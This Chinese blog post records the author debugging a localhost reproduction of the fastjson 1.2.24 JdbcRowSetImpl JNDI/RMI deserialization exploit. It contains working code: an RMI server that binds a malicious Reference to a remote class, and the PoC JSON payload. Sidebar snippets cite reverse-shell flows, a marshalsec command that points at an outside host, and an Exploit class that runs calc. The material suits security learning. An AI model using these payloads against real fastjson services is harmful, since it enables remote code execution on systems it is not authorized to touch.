对于fastjson之rmi利用问题的解决

最新推荐文章于 2024-06-04 23:11:16 发布
最新推荐文章于 2024-06-04 23:11:16 发布
阅读量642 收藏 17
点赞数 10
分类专栏: 千奇百怪的问题解决 文章标签: java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79724395/article/details/138850063
版权

前言

也是被一个问题困扰了好久,都要崩溃了,就为了一个问题调试半天的代码,最后终于解决了,现在做一个记录,幸好没有放弃,感觉学java是比较慢的,但是学java就是重在分析能力的提升,所以慢也没有关系

问题

对于fastjson之rmi利用的时候,发现我开启python服务,上面放了我的恶意代码,但是竟然没有获取到我们的恶意代码就弹出了计算器,这是为什么,很离谱

解决思考一

难道是我的代码写错了,于是决定去抄一下别人的代码,代码如下
RMI服务端
RMIServer


 - [ ] package FastJson24.JdbcRowSetImpl.RMI;

import com.sun.jndi.rmi.registry.ReferenceWrapper;
import javax.naming.Reference;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

public class RMIServer {
    public static void main(String args[]) throws Exception {
        Registry registry = LocateRegistry.createRegistry(1098);
        // 第一个参数无所谓,第二个参数为我们http下的类名
        Reference refObj = new Reference("Exp.class", "Exp", "http://127.0.0.1:8000/");
        ReferenceWrapper refObjWrapper = new ReferenceWrapper(refObj);
        registry.bind("refObj", refObjWrapper);
    }
}

学习过rmi的话,可以简单分析一下代码,因为我们的是服务端和注册是在一个代码里面

首先我们创建了一个注册表,绑定我们的1098端口,然后创建了一个refernce对象,Exp.class"是类名,"Exp"是工厂类名,而"http://127.0.0.1:8000/"是包含这个类的URL路径。当客户端查找这个对象时,RMI注册表将告诉客户端从哪里下载这个类。

而我们的ReferenceWrapper则是实现了remote接口,因为我们如果要把refenrce加载到注册表上,就需要一个实现remote接口的类,ReferenceWrapper 类解决了这个问题。它扩展了 Remote 接口,并包装了一个 Reference 对象。这样,ReferenceWrapper 的实例就可以被绑定到 RMI 注册表中,并且可以通过 RMI 进行远程访问。

最后bind方法将ReferenceWrapper对象绑定到RMI注册表中的"refObj"这个名称上。这样客户端就可以通过这个名称来查找并下载相应的类,然后进行远程方法调用。

我们的poc

package FastJson24.JdbcRowSetImpl.RMI;

import com.alibaba.fastjson.JSON;
public class FJPoC {
    public static void main(String[] args) throws Exception {
        String PoC = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\", \"dataSourceName\":\"rmi://127.0.0.1:1098/refObj\", \"autoCommit\":true}";
        JSON.parse(PoC);
    }
}

可以看到poc是通过设置JdbcRowSetImpl的dataSourceName的值

感觉也是没有问题啊,确实没问题,这里就复现rmi的知识吧

问题解决二

我们的poc没有问题,我们看看报错

Exception in thread "main" com.alibaba.fastjson.JSONException: set property error, autoCommit
	at com.alibaba.fastjson.parser.deserializer.FieldDeserializer.setValue

难道我们的autoCommit":true没有设置成功,我们调试一下看看,这个autoCommit是在哪里调用

在这里插入图片描述可以看到是被设置成功了的,所以也不是这个问题

jdk版本问题,fastjson版本

也是去看了一下,没有问题

正解

到我们的getObjectFactoryFromReference方法在这里插入图片描述按理来说这里本地应该是获取到null的,进入到下面的远程调用,但是问题就是在根本没有进入到下面的,本地就已经有了在这里插入图片描述

我们导航过去看看
在这里插入图片描述

原来就是自己的这个exp,那问题应该是出现在这,我们把这个删了之后,再次调试,成功解决了问题,调用到了远程的类

在这里插入图片描述

总结

当然,自己尝试的方法远远不止这些,调试了很多。所以如果自己更清楚这个过程的话,知道过程的关键点就会容易得多。

nn0nkey k1n9
关注
  • 10
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Fastjson反序列化漏洞利用分析合集
不忘初心,护天下安全!
07-18 223
流程的话就是通过靶场主机,发送payload,访问远程主机的9999端口也就是上边的ip2,之后因为9999端口开启的rmi服务,所以会直接访问7777端口的shell.class,之后执行class文件,进行反弹shell到公网ip(上边的ip1)在前边的POJO中特意提到过,这个toJSONString会默认执行调用类中的getter(),所以当我们payload传入BasicDataSource类后,就会调用他对应的getter()——getConnection()...
Fastjson JdbcRowSetImpl利用链学习
虚幻私塾
04-15 1417
Python微信订餐小程序课程视频 https://blog.csdn.net/m0_56069948/article/details/122285951 Python实战量化交易理财系统 https://blog.csdn.net/m0_56069948/article/details/122285941 JdbcRowSetImpl 接着继续学习fastjson的第二条链JdbcRowSetImpl,主要是利用jndi注入达到的攻击,而且没有什么利用限制,而且其原理就是setter的自动调用,具体set
[Java安全]—fastjson漏洞利用
Sentiment的博客
07-03 5402
这两天要出去就不再学新东西了,正好两点睡不着了,起来学学fastjson弥补一些接下来的内容。Fastjson 组件是阿里巴巴开发的反序列化与序列化组件Fastjson组件在反序列化不可信数据时会导致远程代码执行。究其原因:依赖 POJO POJO 是 Plain OrdinaryJava Object 的缩写,但是它通指没有使用 Entity Beans 的普通 java 对象,可以把 POJO 作为支持业务逻辑的协助类Demo 结果: test1可以看到调用时会自动调用对应的其次是若加上,则返回的内容除
Fastjson漏洞利用合集
2301_76786857的博客
03-07 1342
FastJson 是Alibaba 的一款开源Json解析库,可用于将Java 对象转换为其Json 表示形式,也可以用于将Json 字符串转换为等效的Java 对象。近几年来FastJson 漏洞层出不穷。RCE漏洞的源头:17年FastJson 爆出的1.2.24 反序列化漏洞。
浅析FastJson不出网利用
ki10Moc的博客
11-14 2235
浅析FastJson不出网利用
hacker远程控制的艺术之fastjson-1.2.47利用原理分析
hobby云说
11-19 771
前言 Fastjson是咱们中国人发明的一个Java库,来自阿里巴巴的温少,它可以把Java对象转换为Json格式,同时,它也可以把json字符串转换为Java对象。它可以操作任何的Java对象,即便是一些预先存在,但没有源码的对象。正是因为这一点,给了安全界大佬们可乘之机,自1.2.24版本开始,温少就一直和他们不断斡旋,打着回合战。修复一个版本,过没多久又来一个绕过,攻防过程好不精彩。 截止今天现在2020.11.15 22:30,已经更新到1.2.75版本了,在此版本之...
fastjson复现利用
qq_43660551的博客
08-16 1516
进入target下,启动rmi服务:java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.0.104:8080/#TouchFile" 2222。上传恶意文件到公网,在本机打开命令行,进入存放java文件的目录,javac TouchFile.java编译刚才的java文件,编译完成在当前目录下发现class文件已经存在:TouchFile.class。至此,攻击环境准备好了。.....
Fastjson小于1.2.68全漏洞RCE利用exp
热门推荐
LiBai'S BLOG
03-01 1万+
json Exploit.java public class Exploit{ public Exploit() {} static { try { String[] cmds = System.getProperty("os.name").toLowerCase().contains("win") ? new String[]{"cmd.exe","/c", "calc.exe"} ..
详解在springmvc中解决FastJson循环引用的问题
10-20
本篇文章主要介绍了在springmvc中解决FastJson循环引用的问题,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
fastjson-c3p0:fastjson不出网回显利用
03-19
fastjson不出网回显利用 POST /json HTTP/1.1 Host: 127.0.0.1:8999 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0....
fastjson反序列化利用
09-29
“本工具仅能在取得足够合法授权的企业安全建设中使用,在使用本工具过程中,您应确保自己所有行为符合当地的法律法规。 如您在使用本工具的过程中存在任何非法行为,您将自行承担所有后果,本工具所有开发者和所有...
fastjson1.2.47远程代码漏洞解决方案.rar
07-12
fastjson版本低于1.2.47出现的远程代码漏洞解决方案。
解决fastjson从1.1.41升级到1.2.28后报错问题详解
10-15
主要介绍了解决fastjson从1.1.41升级到1.2.28后报错问题详解,需要的朋友可以参考下
进阶2 探索图形化编程:扩展图形组件与切片开发的魅力
优树搭的博客
05-30 1503
当这些切片成功地通过图形程序串联起来后,在后续进行程序升级或维护时,大家会惊喜地发现,图形程序就如同清晰的路标一般,可以非常便捷地通过图形程序准确地定位到相关切片,并对这些切片进行在线查看、编辑和执行等操作。而且,这些切片的代码长度通常不会太长,相比传统开发的代码,阅读起来要容易得多,这无疑会给系统后续的工作带来极大的便利。
JavaScript第九讲:BOM编程
最新发布
星途码客的博客
06-04 708
今天星途给大家带来JavaScript倒数第二部分知识:BOM编程,希望对码客们有帮助。
Java 异常处理中try-catch块、finally子句以及自定义异常的使用
Itmastergo的博客
05-31 908
异常是程序运行过程中出现的非正常情况。Java 使用异常类(Exception 类及其子类)来表示这些异常情况。异常处理的核心思想是将正常的程序流程与异常处理流程分离开来,使代码更加清晰和可维护。Throwable 类:所有异常和错误的基类。Error 类:表示系统级的错误,程序通常无法处理,比如内存不足(OutOfMemoryError)。Exception 类:表示程序中可以处理的异常情况。RuntimeException 类。
Java手动启动jar包
liangweihao的博客
05-29 380
【代码】Java手动启动jar包。
Redis学习笔记【基础篇】
qq_42192253的博客
05-30 1068
这样以来,我们就可以把不同类型的数据区分开了。从而避免了key的冲突问题。HSET key field value:添加或者修改hash类型key的field的值。获取sorted set 中的指定元素的排名:ZRANK key member。HGET key field:获取一个hash类型key的field的值。通过给key添加前缀加以区分,不过这个前缀不是随便加的,有一定的规范。HMSET:批量添加多个hash类型key的field的值。HMGET:批量获取多个hash类型key的field的值。
如何解决fastjsonfastjson2的兼容问题
08-11
解决fastjsonfastjson2的兼容问题,可以尝试以下几种方法: 1. 升级fastjson版本:如果你的项目中正在使用旧版本的fastjson,尝试将其升级到最新版本。新版本通常会修复一些兼容性问题,可能能解决你遇到的问题...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值